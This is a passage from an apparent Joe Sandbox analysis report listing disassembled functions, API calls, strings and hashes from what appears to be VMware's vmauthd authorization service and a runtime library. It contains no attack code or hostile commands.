                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$memchr
                                                    • String ID: [Ticket] Cannot find end of %s: %s.$[Ticket] Cannot find end of %s: ticket on disk is truncated.$[Ticket] Cannot read %s: %s.$[Ticket] Cannot read %s: ticket on disk is truncated.$[Ticket] Cannot seek to the beginning of %s.
                                                    • API String ID: 2802726676-2402547190
                                                    • Opcode ID: 1ca059033c71e2ec48a445b06315e84316e2d945d2e5586c7a673ca95a533be6
                                                    • Instruction ID: 8862a09b599239279c5992f10890ef126e140ddabaed0107677a65258800745e
                                                    • Opcode Fuzzy Hash: 1ca059033c71e2ec48a445b06315e84316e2d945d2e5586c7a673ca95a533be6
                                                    • Instruction Fuzzy Hash: 3251EC72B041085FDB20DF68DD42BEDB3F9DB94314F10109BE989B7341EA715E828B91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED1260 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 131COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Warning.VMWAREBASE(Received PROXY command for %s, session = %s,?,?), ref: 00ED1282
                                                    • Warning.VMWAREBASE(%s: routing vpxa NFC connection to hostd.,VMAuthdPROXYCommand), ref: 00ED12C9
                                                    • Warning.VMWAREBASE(%s: routing vpxa NFC SSL connection to hostd.,VMAuthdPROXYCommand), ref: 00ED1318
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning
                                                    • String ID: %s: routing vpxa NFC SSL connection to hostd.$%s: routing vpxa NFC connection to hostd.$PROXY service %s not found.$Received PROXY command for %s, session = %s$VMAuthdPROXYCommand$ha-nfc$ha-nfcssl$nfc$nfcssl$vmware-hostd$vpxa-nfc$vpxa-nfcssl
                                                    • API String ID: 2415109466-2929834238
                                                    • Opcode ID: e92237ea31f69d89c3dc3331b8c536f4c2c9f37309d8779e3719722459a3c56f
                                                    • Instruction ID: 03ae3ee2b6965dc4f384e9e033ea837db56d7f4da82310e8f04acd9d5f546b09
                                                    • Opcode Fuzzy Hash: e92237ea31f69d89c3dc3331b8c536f4c2c9f37309d8779e3719722459a3c56f
                                                    • Instruction Fuzzy Hash: 5541B211A082803AC7211B7469A27B62B97CB67788B4E35E3D885FF752E1039D0B8292
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED6510 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 279COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Warning.VMWAREBASE(00000002,00000000,?,00000000,?,00ED6AB7,00000000,00000000,00000000,?,00000000), ref: 00ED65D9
                                                    • wcschr.VCRUNTIME140(00000000,0000003D,00000000), ref: 00ED6624
                                                    • wcschr.VCRUNTIME140(00000000,0000003D,?,?,?,?,?,?,?,00000000), ref: 00ED664B
                                                    • CompareStringOrdinal.KERNEL32(00000000,?,00000000,00000000,00000001,?,?,?,?,?,?,?,00000000), ref: 00ED6672
                                                    • CompareStringOrdinal.KERNEL32(00000000,000000FF,00000000,?,00000001,?,?,?,?,?,00000000), ref: 00ED66CD
                                                    • memcpy.VCRUNTIME140(00000000,00000000,-00000001,?,?,00000000), ref: 00ED676B
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000), ref: 00ED67D6
                                                      • Part of subcall function 00ED27C0: GetLastError.KERNEL32(?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27D8
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27F3
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00EDA850,?,?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED2807
                                                      • Part of subcall function 00ED27C0: _printf.MSPDB140-MSVCRT ref: 00ED2824
                                                      • Part of subcall function 00ED27C0: SetLastError.KERNEL32(00000000,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED282D
                                                    Strings
                                                    • The system environment block is too long. Please fix your environment block and try again., xrefs: 00ED6556
                                                    • Your environment block appears to be corrupted (malformed key=value: %S). Please fix your environment block and try again., xrefs: 00ED67BF
                                                    • Failed comparing system vs user environment keys: %S vs %S. Please fix the environment blocks and try again., xrefs: 00ED6796
                                                    • The child environment block is too long. Please fix your environment block and try again., xrefs: 00ED65AE
                                                    • The system environment block appears to be corrupted (malformed key=value: %S). Please fix your environment block and try again., xrefs: 00ED678D
                                                    • Failed comparing a key against user environment keys: %S vs %S. Please fix your environment block and try again., xrefs: 00ED67AB
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$CompareErrorLastOrdinalStringwcschr$_printffreememcpy
                                                    • String ID: Failed comparing a key against user environment keys: %S vs %S. Please fix your environment block and try again.$Failed comparing system vs user environment keys: %S vs %S. Please fix the environment blocks and try again.$The child environment block is too long. Please fix your environment block and try again.$The system environment block appears to be corrupted (malformed key=value: %S). Please fix your environment block and try again.$The system environment block is too long. Please fix your environment block and try again.$Your environment block appears to be corrupted (malformed key=value: %S). Please fix your environment block and try again.
                                                    • API String ID: 1816562336-76596275
                                                    • Opcode ID: 0d12d636acddc0f3af517d6b2960868d840823b26850835be46e842c5ed8b95f
                                                    • Instruction ID: 9bc814760c3ab7eee9f3827f74928042707086479b99412e35d0173bb4db5ac8
                                                    • Opcode Fuzzy Hash: 0d12d636acddc0f3af517d6b2960868d840823b26850835be46e842c5ed8b95f
                                                    • Instruction Fuzzy Hash: C191C035E002159BCB24DF68DC41ABEB7B5EF84708F19519BE916BB380E771AE42C790
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED79A0 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 117COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • isgraph.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,00ED7FAD,?,00000000,?,?,00000000), ref: 00ED79C5
                                                    • Warning.VMWAREBASE([Ticket] Failed to setup ticket dir (service: %s).,none,?,00000000), ref: 00ED7A34
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,[Ticket] Failed to setup ticket dir (service: %s).,none,?,00000000), ref: 00ED7A3C
                                                    • Warning.VMWAREBASE([Ticket] Non-graphic character in the ticket.,?,?,?,00ED7FAD,?,00000000,?,?,00000000), ref: 00ED7A5D
                                                    • Warning.VMWAREBASE([Ticket] Illegal character in the ticket.,?,?,00000000,?,?,00ED7FAD,?,00000000), ref: 00ED7A7D
                                                    • Warning.VMWAREBASE(00000000,%s%s%s,00000000,vmtck-,?,?,00000000), ref: 00ED7AAB
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,%s%s%s,00000000,vmtck-,?,?,00000000), ref: 00ED7AB5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$free$isgraph
                                                    • String ID: %s%s%s$[Ticket] Failed to setup ticket dir (service: %s).$[Ticket] Illegal character in the ticket.$[Ticket] Non-graphic character in the ticket.$none$vmtck-
                                                    • API String ID: 3385091950-1776490052
                                                    • Opcode ID: d8cd1aa215fb2e33ea0d86ab9aa5c90d5b03c1d85da405115de59d947c823be8
                                                    • Instruction ID: 53d7805975eb0d2a8cf156b28bac2d871b289e3313c9f360bd70daab63791b39
                                                    • Opcode Fuzzy Hash: d8cd1aa215fb2e33ea0d86ab9aa5c90d5b03c1d85da405115de59d947c823be8
                                                    • Instruction Fuzzy Hash: 61310971B042099BDF10AFA9AC427FEB7A4DF44309F0410ABED49B7342FA215A1B8791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF87A55 Relevance: 22.9, APIs: 15, Instructions: 357COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: _free$Info
                                                    • String ID:
                                                    • API String ID: 2509303402-0
                                                    • Opcode ID: 877cd37a74fd30be6ff93f21f8c6eb4645add747d1025197f4e5eedab69ebb41
                                                    • Instruction ID: 9131ef9baf839c90e400adb40db282fa84ce9a80963871aee1b003a1bd9444c1
                                                    • Opcode Fuzzy Hash: 877cd37a74fd30be6ff93f21f8c6eb4645add747d1025197f4e5eedab69ebb41
                                                    • Instruction Fuzzy Hash: FFD18D71A022059FDB11CFA8C880BEEBBF5FF09308F14416AE995A7791D775A845CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED39A0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 135networksynchronizationCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Warning.VMWAREBASE(?,00000406,?,?,?), ref: 00ED39D9
                                                    • Warning.VMWAREBASE(00000000,?,?,?,?,?,?), ref: 00ED3A21
                                                    • WSAGetLastError.WS2_32(?,?,?,?,?,?), ref: 00ED3A2B
                                                    • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?), ref: 00ED3A49
                                                    • WSAGetLastError.WS2_32(?,?,?,?,?,?), ref: 00ED3A97
                                                    • Warning.VMWAREBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00ED3AD1
                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00ED3AEE
                                                    Strings
                                                    • send timed-out waiting for data on connection. aborting., xrefs: 00ED3A53
                                                    • %s(): send() FAIL: %d., xrefs: 00ED3AA3
                                                    • %s(): writing to closed socket: %s., xrefs: 00ED3B40
                                                    • VMAuthdSocketWrite, xrefs: 00ED3A9E, 00ED3AB2, 00ED3B3B
                                                    • %s: write failed. Closing socket for writing., xrefs: 00ED3AB7
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$ErrorLast$CloseHandleObjectSingleWait
                                                    • String ID: %s(): send() FAIL: %d.$%s(): writing to closed socket: %s.$%s: write failed. Closing socket for writing.$VMAuthdSocketWrite$send timed-out waiting for data on connection. aborting.
                                                    • API String ID: 3682901111-525854830
                                                    • Opcode ID: 7b3b0546f34ed163a2097f3f388bb800e6262ccc4581abda3fb7a0a6dc509acc
                                                    • Instruction ID: 4f10896490f9806e90be0d1dcdc6a3760f05d0c1eca67ad82f2b4cd2fc6ad263
                                                    • Opcode Fuzzy Hash: 7b3b0546f34ed163a2097f3f388bb800e6262ccc4581abda3fb7a0a6dc509acc
                                                    • Instruction Fuzzy Hash: 10411971700209AFD724AB38DC45BE5B3A4EB00728F00176BE969B73C1DB719A5A9791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED3550 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 126COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Warning.VMWAREBASE(?,00000400,%s-fd,00ED13A6,?,ha-nfcssl), ref: 00ED3592
                                                    • Warning.VMWAREBASE(?,?,FFFFFFFF,?,?,?,00000400,%s-fd,00ED13A6,?,ha-nfcssl), ref: 00ED35C4
                                                      • Part of subcall function 00ED6EA0: RevertToSelf.ADVAPI32(00ED35D3,?,?,?,?,?,?,?,ha-nfcssl), ref: 00ED6E80
                                                      • Part of subcall function 00ED3B70: Warning.VMWAREBASE(?,00000400,?,?), ref: 00ED3B96
                                                    • Warning.VMWAREBASE(FFFFFFFF,?,000000FF,00EDA6D7,00000000,?,00000000,?,?,?), ref: 00ED3638
                                                    • Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,?,?,?,ha-nfcssl), ref: 00ED3651
                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,ha-nfcssl), ref: 00ED366E
                                                    • CloseHandle.KERNEL32(FFFFFFFF,?,?,?,?,?,?,?,?,?,?,?,ha-nfcssl), ref: 00ED36A6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$CloseHandle$RevertSelf
                                                    • String ID: %s-fd$Connect %s$Error connecting to %s service instance.$NOT_IMPLEMENTED %s:%d$bora\apps\vmauthd\authdWin32.c$ha-nfcssl
                                                    • API String ID: 3821156272-2383663668
                                                    • Opcode ID: a592a8fd02537f2bbe79de35724cab1e595313bbded32a26b4f03940ba9626b1
                                                    • Instruction ID: 2f03f18991f92193cbb087e13d1840e2807475a8bd9e3ec5386b10e73a041c86
                                                    • Opcode Fuzzy Hash: a592a8fd02537f2bbe79de35724cab1e595313bbded32a26b4f03940ba9626b1
                                                    • Instruction Fuzzy Hash: 664181B1600609BBDB24DF34CD81F99B7A8EB04714F001356F728B73D1DB30AA568BA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED59F0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 64registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterServiceCtrlHandlerW.ADVAPI32(VMAuthdService,Function_00004280), ref: 00ED5A1C
                                                    • GetLastError.KERNEL32 ref: 00ED5A2B
                                                      • Part of subcall function 00ED27C0: GetLastError.KERNEL32(?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27D8
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27F3
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00EDA850,?,?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED2807
                                                      • Part of subcall function 00ED27C0: _printf.MSPDB140-MSVCRT ref: 00ED2824
                                                      • Part of subcall function 00ED27C0: SetLastError.KERNEL32(00000000,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED282D
                                                    • SetServiceStatus.ADVAPI32(00EE1040), ref: 00ED5A95
                                                    • GetLastError.KERNEL32 ref: 00ED5A9F
                                                    Strings
                                                    • SetServiceStatus error on failure %ld, xrefs: 00ED5AA6
                                                    • VMAuthdService, xrefs: 00ED59F9
                                                    • SetServiceStatus error %ld, xrefs: 00ED5AD6
                                                    • Service Started., xrefs: 00ED5AE5
                                                    • RegisterServiceCtrlHandler failed %d, xrefs: 00ED5A32
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$ServiceWarning$CtrlHandlerRegisterStatus_printf
                                                    • String ID: RegisterServiceCtrlHandler failed %d$Service Started.$SetServiceStatus error %ld$SetServiceStatus error on failure %ld$VMAuthdService
                                                    • API String ID: 2840417057-1304299312
                                                    • Opcode ID: 8832d356aff54ea71ce90010b8ab0f380f9fd9259961ac2ec3a7a912180e5ebb
                                                    • Instruction ID: 621afc0ba513330bf95403e5d0170271c1ed8a662f08e18d293d33ed5453cc64
                                                    • Opcode Fuzzy Hash: 8832d356aff54ea71ce90010b8ab0f380f9fd9259961ac2ec3a7a912180e5ebb
                                                    • Instruction Fuzzy Hash: 0521D5B15413899FD3106F52FC8BB293768E710749F0051ABF904B9391E7B689DD8B62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF77D16 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6CFDB368,00000FA0,?,?,6CF77CF4), ref: 6CF77D22
                                                    • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,6CF77CF4), ref: 6CF77D2D
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6CF77CF4), ref: 6CF77D3E
                                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 6CF77D50
                                                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 6CF77D5E
                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,6CF77CF4), ref: 6CF77D81
                                                    • DeleteCriticalSection.KERNEL32(6CFDB368,00000007,?,?,6CF77CF4), ref: 6CF77D9D
                                                    • CloseHandle.KERNEL32(00000000,?,?,6CF77CF4), ref: 6CF77DAD
                                                    Strings
                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 6CF77D28
                                                    • kernel32.dll, xrefs: 6CF77D39
                                                    • SleepConditionVariableCS, xrefs: 6CF77D4A
                                                    • WakeAllConditionVariable, xrefs: 6CF77D56
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                    • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                    • API String ID: 2565136772-3242537097
                                                    • Opcode ID: 1fc53b841a6bb6dff2a1e8642784b3dde3a37fdb6b59e1d28cb73391f6d0a0a8
                                                    • Instruction ID: 443a726ab103fb4b4b34e9a0b5bb8b583d3405c7aadfa375b605803703e7439c
                                                    • Opcode Fuzzy Hash: 1fc53b841a6bb6dff2a1e8642784b3dde3a37fdb6b59e1d28cb73391f6d0a0a8
                                                    • Instruction Fuzzy Hash: CA01B135F21601ABEFE10FB5AA0CB667AFCEF8A7457200817F904D2A20EB21D8009671
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED2610 Relevance: 21.0, APIs: 9, Strings: 3, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Warning.VMWAREBASE(?,00000000), ref: 00ED2625
                                                    • Warning.VMWAREBASE(00000000,vmware,?,00000000), ref: 00ED2632
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,vmware,?,00000000), ref: 00ED2638
                                                    • Warning.VMWAREBASE ref: 00ED263E
                                                    • Warning.VMWAREBASE(?), ref: 00ED2647
                                                    • Warning.VMWAREBASE(?,?), ref: 00ED2665
                                                    • Warning.VMWAREBASE(00000001,authd.policy.allowRCForRead,?,?), ref: 00ED2671
                                                    • Warning.VMWAREBASE(0000005A,vmauthd.startupTimeout,00000001,authd.policy.allowRCForRead,?,?), ref: 00ED2682
                                                    • Warning.VMWAREBASE(?,0000005A,vmauthd.startupTimeout,00000001,authd.policy.allowRCForRead,?,?), ref: 00ED268D
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(vmauthd,00000000,00000000,00000000,?,00000000,00000000,?,00ED269A), ref: 00ED2864
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(?,?,00000000,00000000,?,00ED269A), ref: 00ED2871
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(00000000,vmauthd,log.syslogID,?,?,00000000,00000000,?,00ED269A), ref: 00ED2887
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(00000000,00000003,log.syslogMinLevel,00000000,vmauthd,log.syslogID,?,?,00000000,00000000,?,00ED269A), ref: 00ED2894
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(?,?,?,?,?,?,?,?,00000000,00000000,?,00ED269A), ref: 00ED289C
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(?,?,?,?,?,?,?,?,00000000,00000000,?,00ED269A), ref: 00ED28A3
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,00ED269A), ref: 00ED28A9
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(00000000,00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,00ED269A), ref: 00ED28AF
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,00ED269A), ref: 00ED28B5
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,00ED269A), ref: 00ED28BB
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(vmauthd,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00ED28C7
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(00000000,vmauthd,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00ED28D2
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(?,00000000,vmauthd.log.fileName,?,?,00000000,00000000,?,00ED269A), ref: 00ED28E7
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(00000000,?,vmauthd.log.fileName,?,?,00000000,00000000,?,00ED269A), ref: 00ED28F6
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(00000000,%s\%s,00000000,vmauthd.log,?,?,vmauthd.log.fileName,?,?,00000000,00000000,?,00ED269A), ref: 00ED2910
                                                      • Part of subcall function 00ED2850: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,%s\%s,00000000,vmauthd.log,?,?,vmauthd.log.fileName,?,?,00000000,00000000,?,00ED269A), ref: 00ED2918
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 00ED292B
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(00000000,00000000,log.fileName,?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 00ED2939
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(00000000,vmauthd,log.suffix,00000000,00000000,log.fileName,?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 00ED2949
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(00000000,00000001,log.systemAreaTemp,00000000,vmauthd,log.suffix,00000000,00000000,log.fileName,?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 00ED2956
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(00000000,00000003,log.logMinLevel,00000000,00000001,log.systemAreaTemp,00000000,vmauthd,log.suffix,00000000,00000000,log.fileName,?,vmauthd.log.fileName,?,?), ref: 00ED2963
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,vmauthd.log.fileName,?,?), ref: 00ED296B
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,vmauthd.log.fileName,?,?), ref: 00ED2972
                                                      • Part of subcall function 00ED2850: Warning.VMWAREBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,vmauthd.log.fileName), ref: 00ED2978
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$free
                                                    • String ID: authd.policy.allowRCForRead$vmauthd.startupTimeout$vmware
                                                    • API String ID: 2642810717-3237359284
                                                    • Opcode ID: 29e3c4f8bb57d708be2beaca962707b503985b7cf66314260ecb5be5c6d30115
